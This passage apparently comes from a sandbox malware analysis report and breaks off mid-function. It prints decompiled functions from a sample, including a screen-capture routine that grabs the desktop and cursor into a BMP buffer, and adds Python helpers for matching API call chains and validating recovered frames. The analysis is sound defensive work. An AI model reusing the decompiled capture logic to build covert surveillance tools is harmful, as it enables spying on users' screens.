            • GetOEMCP.KERNEL32 ref: 044563A7
              • Part of subcall function 0445DFC2: GetCurrentProcessId.KERNEL32 ref: 0445DFE9
              • Part of subcall function 0445DFC2: GetLastError.KERNEL32 ref: 0445E0E3
              • Part of subcall function 0445DFC2: GetSystemMetrics.USER32(00001000), ref: 0445E0F3
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: 335593638ee1fad6692b72f46bf02759426e93283b178b845c017f66117483b0
            • Instruction ID: 9a1398ce0f7e402bd31668c1fbbf91c5da9255c901732fa9c2a403fb9058452a
            • Opcode Fuzzy Hash: 335593638ee1fad6692b72f46bf02759426e93283b178b845c017f66117483b0
            • Instruction Fuzzy Hash: E9015E71204252CFEF24EF68E5096A677E0FF46314F8A01BBE84C8A123D7306851CB52
            Uniqueness

            Uniqueness Score: -1.00%
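            The "APIs" bullets in these listings follow one fixed shape (name, module, optional argument list, call-site address, and a "Part of subcall function" prefix when the call is reached through a callee), which makes them easy to process in bulk. The block below is an added example in Python, not part of the report and not Joe Sandbox's own signature logic: it parses bullets in that shape and matches ordered API chains against a function's direct calls. The two rules in RULES are this example's assumption; they encode the GDI screen-capture sequence and the cursor-overlay sequence visible in the listing for E04455D1E further down this page. The sample inputs are copied from this page's listings.

```python
"""Parse the 'APIs' bullets of a Joe Sandbox function listing and match call chains.

Added example, not part of the report. Each bullet is
'Name.MODULE(arg,...), ref: ADDR', optionally prefixed with
'Part of subcall function ADDR:' when the call happens inside a callee.
RULES is this example's own assumption (it mirrors the sequence seen in
E04455D1E on this page), not Joe Sandbox's signature engine.
"""
import re
from dataclasses import dataclass
from typing import Optional

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # raw hex arguments; '?' is an argument the sandbox could not resolve
    ref: int                # address of the call instruction
    subcall: Optional[int]  # callee address when the call is made inside a subroutine


def parse_api_lines(text: str) -> list:
    """Turn bullet lines into ApiCall records; lines that are not bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


# Ordered chains (assumed rules for this example). A rule fires when its APIs
# occur in this order among the function's own (non-subcall) calls; unrelated
# calls may sit in between.
RULES = {
    "screen_capture_gdi": ("GetDC", "CreateCompatibleDC", "CreateCompatibleBitmap",
                           "SelectObject", "BitBlt", "GetDIBits"),
    "cursor_overlay": ("GetCursorInfo", "CopyIcon", "GetIconInfo", "DrawIconEx"),
}


def has_chain(calls: list, chain: tuple) -> bool:
    """Ordered-subsequence match over the direct calls, in listing order."""
    direct = [c for c in calls if c.subcall is None]
    pos = 0
    for want in chain:
        while pos < len(direct) and direct[pos].api != want:
            pos += 1
        if pos == len(direct):
            return False
        pos += 1
    return True


def matching_rules(calls: list) -> list:
    """Names of every rule whose chain is present, in RULES order."""
    return [name for name, chain in RULES.items() if has_chain(calls, chain)]


# Sample input copied from this page: the GetOEMCP listing above and the E04455D1E listing below.
GETOEMCP_LISTING = """\
• GetOEMCP.KERNEL32 ref: 044563A7
  • Part of subcall function 0445DFC2: GetCurrentProcessId.KERNEL32 ref: 0445DFE9
  • Part of subcall function 0445DFC2: GetLastError.KERNEL32 ref: 0445E0E3
  • Part of subcall function 0445DFC2: GetSystemMetrics.USER32(00001000), ref: 0445E0F3
"""

SCREENSHOT_LISTING = """\
• GetDC.USER32(00000000), ref: 04455D3D
• CreateCompatibleDC.GDI32(00000000), ref: 04455D51
• GetDeviceCaps.GDI32(00000000,00000008), ref: 04455D6A
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 04455D72
• CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 04455D7C
• SelectObject.GDI32(00000000,00000000), ref: 04455D8E
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 04455DB2
• GetCursorInfo.USER32(?), ref: 04455DC3
• CopyIcon.USER32 ref: 04455DD8
• GetIconInfo.USER32(00000000,?), ref: 04455DE6
• GetObjectW.GDI32(?,00000018,?), ref: 04455E04
• DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 04455E1C
• SelectObject.GDI32(00000000,?), ref: 04455E29
• GetObjectW.GDI32(00000000,00000018,?), ref: 04455E43
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 04455EBF
• DeleteDC.GDI32(00000000), ref: 04455F70
• DeleteObject.GDI32(00000000), ref: 04455F86
"""

if __name__ == "__main__":
    for name, text in (("GetOEMCP function", GETOEMCP_LISTING), ("E04455D1E", SCREENSHOT_LISTING)):
        calls = parse_api_lines(text)
        print(f"{name}: {len(calls)} calls, rules hit: {matching_rules(calls) or 'none'}")
```

            Subcall bullets are parsed but excluded from chain matching on purpose: a chain that only exists across several callees says less about the function being read than one whose call sites all sit inside it, and the subcall address is kept on the record so a second pass can regroup those calls by callee.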

            C-Code - Quality: 100%
            			E0445CA0A(void* __ecx) {
            				signed int _v8;
            				intOrPtr _t12;
            				void* _t13;
            				void* _t14;
            				void* _t17;
            				intOrPtr _t18;
            				void* _t23;
            
            				_v8 = _v8 & 0x00000000;
            				_t12 =  *0x446f8d8; // 0x450fab0
            				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
            				if(_t13 != 0) {
            					_t14 = E0445C9F3(); // executed
            					_t23 = _t14;
            					if(_t23 != 0) {
            						FindCloseChangeNotification(_v8);
            						_t17 = _t23;
            					} else {
            						if(_v8 != _t14) {
            							_t18 =  *0x446f8d0; // 0x450f8c0
            							 *((intOrPtr*)(_t18 + 0x30))(_v8);
            						}
            						_t17 = 0;
            					}
            					return _t17;
            				} else {
            					return _t13;
            				}
            			}

            Instruction addresses, one per line of the C-Code above:
            0x0445ca0e 0x0445ca16 0x0445ca1e 0x0445ca23 0x0445ca2b 0x0445ca30 0x0445ca34 0x0445ca52 0x0445ca55 0x0445ca36
            0x0445ca39 0x0445ca3b 0x0445ca43 0x0445ca43 0x0445ca46 0x0445ca46 0x0445ca59 0x0445ca26 0x0445ca26 0x0445ca26

            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d1ea367ee1c26522b66f21772b1fbc5a44e4777a019d2158a5fa93d7eed820fc
            • Instruction ID: 6871f0ec2038a3f7df09d4dcf947273f75f07c979b0f1ee4d3b1f3d01a2a3827
            • Opcode Fuzzy Hash: d1ea367ee1c26522b66f21772b1fbc5a44e4777a019d2158a5fa93d7eed820fc
            • Instruction Fuzzy Hash: 4DF01731A10614EFDF11DBA8D985A9E77F8FF04249F005096E901E7262D774EE00DB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E04456438() {
            				intOrPtr _t3;
            
            				_t3 =  *0x446f8d0; // 0x450f8c0
            				 *((intOrPtr*)(_t3 + 0x2c))( *0x446f8f4, 0xffffffff);
            				ExitProcess(0);
            			}

            Instruction addresses, one per line of the C-Code above:
            0x04456438 0x04456445 0x0445644f

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0445644F
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 0bd37af94f0524c2f2552795de952f0f797be652a5bdac1de44b8146d4bf4a96
            • Instruction ID: 4490a212c08cb134eb81fa179888e197d5400fffab56738ff2745ddee23e8d23
            • Opcode Fuzzy Hash: 0bd37af94f0524c2f2552795de952f0f797be652a5bdac1de44b8146d4bf4a96
            • Instruction Fuzzy Hash: 59C01270304440DFE740AB64E908F1437E0FF08322F1982E2F16D8A1E8CB2488088B02
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E04458DC9(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x446f9b8, 8, _a4); // executed
            				return _t2;
            			}

            Instruction addresses, one per line of the C-Code above:
            0x04458dd7 0x04458dde

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 17269b41a5182ee65f5036227fd3f0a4f5b109b46328507c33ad42c69ea4a416
            • Instruction ID: 96e7126b5b20090125ffab693b099e35a7a26c2f1ac43ada7e40290e609664fd
            • Opcode Fuzzy Hash: 17269b41a5182ee65f5036227fd3f0a4f5b109b46328507c33ad42c69ea4a416
            • Instruction Fuzzy Hash: B8B0923A084208FBEF411E81FC05A853F69EB08655F004010F648090618BB768699B82
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E0445DADC(void* __ecx) {
            				signed int _t4;
            
            				_t4 = ResumeThread( *(__ecx + 4));
            				asm("sbb eax, eax");
            				return  ~_t4 & 0x00000001;
            			}

            Instruction addresses, one per line of the C-Code above:
            0x0445dae4 0x0445daec 0x0445daf1

            APIs
            • ResumeThread.KERNELBASE(?,0445D947,?,?,00000001), ref: 0445DAE4
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 3acca63354585d44aae84608fbd4e15867b04b41cfab8f44c81d7d129da6c9f5
            • Instruction ID: b41cbc810c511c6758d356603aab191fe6fa44ab0431dc3d45364e1680b88084
            • Opcode Fuzzy Hash: 3acca63354585d44aae84608fbd4e15867b04b41cfab8f44c81d7d129da6c9f5
            • Instruction Fuzzy Hash: E7B092322A04019BCB005B74E80A9A03BE0FB56606B98C2E4E049C6061C32EC8498B40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E04458DB4() {
            				void* _t1;
            
            				_t1 = HeapCreate(0, 0x96000, 0); // executed
            				 *0x446f9b8 = _t1;
            				return _t1;
            			}

            Instruction addresses, one per line of the C-Code above:
            0x04458dbd 0x04458dc3 0x04458dc8

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,04456616), ref: 04458DBD
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: 2034f623c668743850a3c556b9a3770bb95f6d29befaea3d3f06050e5ab44dce
            • Instruction ID: f8177a5c2b2a7b5b0896a6a9973297a2dce4caaf4620958f1c757ec5d1c90cc0
            • Opcode Fuzzy Hash: 2034f623c668743850a3c556b9a3770bb95f6d29befaea3d3f06050e5ab44dce
            • Instruction Fuzzy Hash: A9B012B0699300E6FF500F206C46B013510D344B06F200005F709581C0C7F414049516
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E0445DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
            				signed int _v8;
            				intOrPtr _v12;
            				signed int _t26;
            				signed int _t28;
            				signed int* _t36;
            				signed int* _t39;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t36 = _a8;
            				_t28 = _t36[1];
            				if(_t28 != 0) {
            					_t39 = _t36[2];
            					do {
            						_a8 = _a8 & 0x00000000;
            						if(_t39[2] > 0) {
            							_t31 = _t39[3];
            							_t22 = _a4 + 0x24;
            							_v12 = _a4 + 0x24;
            							_v8 = _t39[3];
            							while(E0445A236(_t22,  *_t31) != 0) {
            								_t26 = _a8 + 1;
            								_t31 = _v8 + 4;
            								_a8 = _t26;
            								_t22 = _v12;
            								_v8 = _v8 + 4;
            								if(_t26 < _t39[2]) {
            									continue;
            								} else {
            								}
            								goto L8;
            							}
            							 *_t36 =  *_t36 |  *_t39;
            						}
            						L8:
            						_t39 =  &(_t39[4]);
            						_t28 = _t28 - 1;
            					} while (_t28 != 0);
            				}
            				Sleep(0xa);
            				return 1;
            			}

            Instruction addresses, one per line of the C-Code above:
            0x0445daf5 0x0445daf6 0x0445daf9 0x0445dafc 0x0445db01 0x0445db04 0x0445db07 0x0445db07 0x0445db0f 0x0445db14
            0x0445db17 0x0445db1a 0x0445db1d 0x0445db20 0x0445db33 0x0445db34 0x0445db37 0x0445db3d 0x0445db40 0x0445db43
            0x00000000 0x00000000 0x0445db45 0x00000000 0x0445db43 0x0445db49 0x0445db49 0x0445db4b 0x0445db4b 0x0445db4e
            0x0445db4e 0x0445db53 0x0445db5b 0x0445db67

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0445DB5B
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 5d4baf7ffef0f2d23b8abbc5e4d7336a83f51678581ecb8087fa9c0873d18652
            • Instruction ID: aae3917fa481d5ff35587fd5ba916a08ad4dd1c500f73564cb73e9268a6d2fd8
            • Opcode Fuzzy Hash: 5d4baf7ffef0f2d23b8abbc5e4d7336a83f51678581ecb8087fa9c0873d18652
            • Instruction Fuzzy Hash: 20113971A00205AFEF10CF99C484A9AB7F9EF45324F10C46AE95A9B311D370F941CB40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E04455D1E(int* __ecx) {
            				signed int _v8;
            				char _v12;
            				int _v16;
            				struct HWND__* _v20;
            				struct HWND__* _v24;
            				struct HDC__* _v28;
            				void* _v32;
            				int* _v36;
            				void* _v40;
            				void* _v44;
            				void* _v48;
            				void* _v52;
            				void* _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				short _v82;
            				short _v84;
            				signed int _v88;
            				signed int _v92;
            				struct tagBITMAPINFO _v96;
            				intOrPtr _v102;
            				int _v110;
            				char _v112;
            				void* _v116;
            				void* _v120;
            				void* _v124;
            				void* _v132;
            				void* _v136;
            				void* _v140;
            				int _v156;
            				signed int _v160;
            				void _v164;
            				int _t82;
            				void* _t84;
            				signed int _t92;
            				void* _t99;
            				char _t103;
            				intOrPtr _t113;
            				int* _t114;
            				struct HDC__* _t120;
            				signed int _t124;
            				short _t137;
            				struct HDC__* _t141;
            				void* _t144;
            				void* _t148;
            
            				_v36 = __ecx;
            				_v24 = 0;
            				_t120 = 0;
            				_v12 = 0;
            				_t144 = 0;
            				_v20 = 0;
            				_t141 = GetDC(0);
            				_v28 = _t141;
            				if(_t141 != 0) {
            					_t120 = CreateCompatibleDC(_t141);
            					if(_t120 != 0) {
            						_v8 = GetDeviceCaps(_t141, 8);
            						_t82 = GetDeviceCaps(_t141, 0xa);
            						_v16 = _t82;
            						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
            						if(_t144 != 0) {
            							_t84 = SelectObject(_t120, _t144);
            							_v32 = _t84;
            							if(_t84 != 0) {
            								_t144 = SelectObject(_t120, _v32);
            								if(_t144 != 0) {
            									GetObjectW(_t144, 0x18,  &_v164);
            									_t92 = _v160;
            									_t124 = _v156;
            									_v92 = _t92;
            									_v84 = 1;
            									_t137 = 0x20;
            									_v82 = _t137;
            									_v96.bmiHeader = 0x28;
            									_v80 = 0;
            									_v76 = 0;
            									_v72 = 0;
            									_v68 = 0;
            									_v64 = 0;
            									_v60 = 0;
            									asm("cdq");
            									_v88 = _t124;
            									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
            									_t99 = E04458DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
            									_v20 = _t99;
            									if(_t99 != 0) {
            										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
            										_v16 = _v8 + 0x36;
            										_t103 = E04458DC9(_v8 + 0x36);
            										_v12 = _t103;
            										if(_t103 != 0) {
            											_v110 = _v16;
            											_v112 = 0x4d42;
            											_v102 = 0x36;
            											E04458EA6(_t103,  &_v112, 0xe);
            											E04458EA6(_v12 + 0xe,  &_v96, 0x28);
            											E04458EA6(_v12 + 0x36, _v20, _v8);
            											_t148 = _t148 + 0x24;
            											_v8 = _v8 & 0x00000000;
            											_t113 = E0445FBFB(_v12, _v16,  &_v8);
            											_v24 = _t113;
            											if(_t113 != 0) {
            												_t114 = _v36;
            												if(_t114 != 0) {
            													 *_t114 = _v8;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				E04458DDF( &_v20, 0);
            				E04458DDF( &_v12, 0);
            				if(_t120 != 0) {
            					DeleteDC(_t120);
            				}
            				if(_t141 != 0) {
            					DeleteDC(_t141);
            				}
            				if(_t144 != 0) {
            					DeleteObject(_t144);
            				}
            				return _v24;
            			}

            Instruction addresses, one per line of the C-Code above:
            0x04455d2a 0x04455d30 0x04455d33 0x04455d35 0x04455d38 0x04455d3a 0x04455d43 0x04455d45 0x04455d4a 0x04455d57
            0x04455d5b 0x04455d6f 0x04455d72 0x04455d78 0x04455d82 0x04455d86 0x04455d8e 0x04455d94 0x04455d99 0x04455e2f
            0x04455e33 0x04455e43 0x04455e49 0x04455e51 0x04455e58 0x04455e5b 0x04455e64 0x04455e65 0x04455e6e 0x04455e75
            0x04455e78 0x04455e7b 0x04455e7e 0x04455e81 0x04455e84 0x04455e87 0x04455e8b 0x04455e9a 0x04455e9d 0x04455ea2
            0x04455ea8 0x04455ebf 0x04455ecc 0x04455ecf 0x04455ed4 0x04455eda 0x04455edf 0x04455ee7 0x04455ef2 0x04455ef9
            0x04455f0e 0x04455f23 0x04455f31 0x04455f34 0x04455f39 0x04455f3e 0x04455f44 0x04455f46 0x04455f4b 0x04455f50
            0x04455f50 0x04455f4b 0x04455f44 0x04455eda 0x04455ea8 0x04455e33 0x04455d99 0x04455d86 0x04455d5b 0x04455f58
            0x04455f63 0x04455f6d 0x04455f70 0x04455f70 0x04455f78 0x04455f7b 0x04455f7b 0x04455f83 0x04455f86 0x04455f86
            0x04455f93

            APIs
            • GetDC.USER32(00000000), ref: 04455D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 04455D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 04455D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 04455D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 04455D7C
            • SelectObject.GDI32(00000000,00000000), ref: 04455D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 04455DB2
            • GetCursorInfo.USER32(?), ref: 04455DC3
            • CopyIcon.USER32 ref: 04455DD8
            • GetIconInfo.USER32(00000000,?), ref: 04455DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 04455E04
            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 04455E1C
            • SelectObject.GDI32(00000000,?), ref: 04455E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 04455E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 04455EBF
            • DeleteDC.GDI32(00000000), ref: 04455F70
            • DeleteDC.GDI32(00000000), ref: 04455F7B
            • DeleteObject.GDI32(00000000), ref: 04455F86
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 782150a44cc4572bcf671fe433972f3c637e0d769979c139dd28502fc384ad7d
            • Instruction ID: 782e0f9d10b968459da91b888c70d561cf23bb0c0059c208ee807c2a9ade7053
            • Opcode Fuzzy Hash: 782150a44cc4572bcf671fe433972f3c637e0d769979c139dd28502fc384ad7d
            • Instruction Fuzzy Hash: 588109B1D00219BBEF14DFE5DC49BAEBBB8EF48304F10406AE904E7251EB749A058B61
            Uniqueness

            Uniqueness Score: -1.00%
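            What E04455D1E hands to E0445FBFB is a plain BMP: the 14-byte BITMAPFILEHEADER (bfType 0x4d42, bfOffBits 0x36), the 40-byte BITMAPINFOHEADER (biSize 0x28, one plane, 32 bits per pixel, every other field zero) and the rows returned by GetDIBits, copied together with three memcpy-style calls of 0xe, 0x28 and _v8 bytes. The block below is an added example in Python, not code from the sample or from Joe Sandbox, that rebuilds that container from the constants visible in the decompilation and, on the responder's side, checks whether a buffer recovered from memory is such a frame. The stride helper computes the same value as the sample's ((w << 5) + 0x1f >> 5) * h << 2 arithmetic. E0445FBFB, which the sample applies to the finished buffer before returning it, is not reproduced because the page does not show what it does; the 2x2 pixel data is constructed test input.

```python
"""Rebuild and recognise the screenshot container assembled by E04455D1E.

Added example; the constants (0x4d42, 0x0e, 0x28, 0x36, planes=1, 32 bpp) come from
the decompiled function on this page.  E0445FBFB, applied by the sample to the finished
buffer, is not modelled.  SAMPLE_PIXELS is constructed input, not a capture.
"""
import struct

BMP_MAGIC = 0x4D42                                   # 'BM', written at _v112
FILE_HEADER_SIZE = 0x0E                              # BITMAPFILEHEADER
INFO_HEADER_SIZE = 0x28                              # BITMAPINFOHEADER, biSize written at _v96
PIXEL_OFFSET = FILE_HEADER_SIZE + INFO_HEADER_SIZE   # 0x36, bfOffBits written at _v102
BITS_PER_PIXEL = 32                                  # biBitCount written at _v82


def row_stride(width: int, bpp: int = BITS_PER_PIXEL) -> int:
    """Bytes per scanline padded to a DWORD boundary; for 32 bpp this equals the
    sample's ((width << 5) + 0x1f >> 5) << 2."""
    return ((width * bpp + 31) // 32) * 4


def image_size(width: int, height: int) -> int:
    """_v8 in E04455D1E: stride times height."""
    return row_stride(width) * height


def build_bmp(width: int, height: int, pixels: bytes) -> bytes:
    """Concatenate file header, info header and raw pixel rows exactly as the sample does."""
    size = image_size(width, height)
    if len(pixels) != size:
        raise ValueError(f"expected {size} pixel bytes, got {len(pixels)}")
    file_header = struct.pack("<HIHHI", BMP_MAGIC, PIXEL_OFFSET + size, 0, 0, PIXEL_OFFSET)
    info_header = struct.pack(
        "<IiiHHIIiiII",
        INFO_HEADER_SIZE, width, height, 1, BITS_PER_PIXEL,
        0, 0, 0, 0, 0, 0,   # biCompression .. biClrImportant, all zeroed by the sample (_v80 .. _v60)
    )
    return file_header + info_header + pixels


def parse_bmp(blob: bytes) -> dict:
    """Validate a recovered buffer against the exact layout E04455D1E produces.

    Raises ValueError unless it is an uncompressed, single-plane, 32 bpp BMP with a
    54-byte header whose declared size matches the buffer length."""
    if len(blob) < PIXEL_OFFSET:
        raise ValueError("too short for a BMP header")
    magic, file_size, _, _, off_bits = struct.unpack_from("<HIHHI", blob, 0)
    (bi_size, width, height, planes, bpp,
     compression, size_image, _, _, _, _) = struct.unpack_from("<IiiHHIIiiII", blob, FILE_HEADER_SIZE)
    if magic != BMP_MAGIC or off_bits != PIXEL_OFFSET or bi_size != INFO_HEADER_SIZE:
        raise ValueError("header layout does not match")
    if planes != 1 or bpp != BITS_PER_PIXEL or compression != 0 or size_image != 0:
        raise ValueError("pixel format does not match")
    if file_size != len(blob) or file_size != PIXEL_OFFSET + image_size(width, abs(height)):
        raise ValueError("declared size disagrees with buffer length")
    return {"width": width, "height": height, "stride": row_stride(width),
            "pixels": blob[PIXEL_OFFSET:]}


def is_frame(blob: bytes) -> bool:
    """True when parse_bmp accepts the buffer; convenient for scanning many candidates."""
    try:
        parse_bmp(blob)
        return True
    except ValueError:
        return False


# Constructed 2x2 BGRX frame, every pixel opaque blue.
SAMPLE_PIXELS = bytes([0xFF, 0x00, 0x00, 0x00]) * 4
SAMPLE_BMP = build_bmp(2, 2, SAMPLE_PIXELS)

if __name__ == "__main__":
    info = parse_bmp(SAMPLE_BMP)
    print(f"{len(SAMPLE_BMP)} bytes, {info['width']}x{info['height']}, stride {info['stride']}")
```

            The size check is deliberately strict. A screenshot of a 1920x1080 desktop at 32 bpp is 0x36 + 1920*1080*4 bytes, so a buffer carved from memory whose header claims anything else is either not one of these frames or has already been through E0445FBFB, and should be treated as a different artefact.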

            C-Code - Quality: 50%
            			E0445EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				char _v24;
            				void* _v28;
            				signed int _v32;
            				char _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				char _v48;
            				char _v52;
            				intOrPtr _v56;
            				signed int _v60;
            				char* _v72;
            				signed short _v80;
            				signed int _v84;
            				char _v88;
            				char _v92;
            				char _v96;
            				intOrPtr _v100;
            				char _v104;
            				char _v616;
            				intOrPtr* _t159;
            				char _t165;
            				signed int _t166;
            				signed int _t173;
            				signed int _t178;
            				signed int _t186;
            				intOrPtr* _t187;
            				signed int _t188;
            				signed int _t192;
            				intOrPtr* _t193;
            				intOrPtr _t200;
            				intOrPtr* _t205;
            				signed int _t207;
            				signed int _t209;
            				intOrPtr* _t210;
            				intOrPtr _t212;
            				intOrPtr* _t213;
            				signed int _t214;
            				char _t217;
            				signed int _t218;
            				signed int _t219;
            				signed int _t230;
            				signed int _t235;
            				signed int _t242;
            				signed int _t243;
            				signed int _t244;
            				signed int _t245;
            				intOrPtr* _t247;
            				intOrPtr* _t251;
            				signed int _t252;
            				intOrPtr* _t253;
            				void* _t255;
            				intOrPtr* _t261;
            				signed int _t262;
            				signed int _t283;
            				signed int _t289;
            				char* _t298;
            				void* _t320;
            				signed int _t322;
            				intOrPtr* _t323;
            				intOrPtr _t324;
            				signed int _t327;
            				intOrPtr* _t328;
            				intOrPtr* _t329;
            
            				_v32 = _v32 & 0x00000000;
            				_v60 = _v60 & 0x00000000;
            				_v56 = __edx;
            				_v100 = __ecx;
            				_t159 = E0445E485(__ecx);
            				_t251 = _t159;
            				_v104 = _t251;
            				if(_t251 == 0) {
            					return _t159;
            				}
            				_t320 = E04458DC9(0x10);
            				_v36 = _t320;
            				_pop(_t255);
            				if(_t320 == 0) {
            					L53:
            					E04458DDF( &_v60, 0xfffffffe);
            					E0445E539( &_v104);
            					return _t320;
            				}
            				_t165 = E04459F85(_t255, 0xcdd);
            				 *_t328 = 0x6b4;
            				_v52 = _t165;
            				_t166 = E04459F85(_t255);
            				_push(0);
            				_push(_v56);
            				_v20 = _t166;
            				_push(_t166);
            				_push(_a4);
            				_t322 = E04459C50(_t165);
            				_v60 = _t322;
            				E04458D9A( &_v52);
            				E04458D9A( &_v20);
            				_t329 = _t328 + 0x20;
            				if(_t322 != 0) {
            					_t323 = __imp__#2;
            					_v40 =  *_t323(_t322);
            					_t173 = E04459F85(_t255, 0xc93);
            					_v20 = _t173;
            					_v52 =  *_t323(_t173);
            					E04458D9A( &_v20);
            					_t324 = _v40;
            					_t261 =  *_t251;
            					_t252 = 0;
            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
            					__eflags = _t178;
            					if(_t178 != 0) {
            						L52:
            						__imp__#6(_t324);
            						__imp__#6(_v52);
            						goto L53;
            					}
            					_t262 = _v32;
            					_v28 = 0;
            					_v20 = 0;
            					__eflags = _t262;
            					if(_t262 == 0) {
            						L49:
            						 *((intOrPtr*)( *_t262 + 8))(_t262);
            						__eflags = _t252;
            						if(_t252 == 0) {
            							E04458DDF( &_v36, 0);
            							_t320 = _v36;
            						} else {
            							 *(_t320 + 8) = _t252;
            							 *_t320 = E04459AB3(_v100);
            							 *((intOrPtr*)(_t320 + 4)) = E04459AB3(_v56);
            						}
            						goto L52;
            					} else {
            						goto L6;
            					}
            					while(1) {
            						L6:
            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
            						__eflags = _t186;
            						if(_t186 != 0) {
            							break;
            						}
            						_v16 = 0;
            						_v48 = 0;
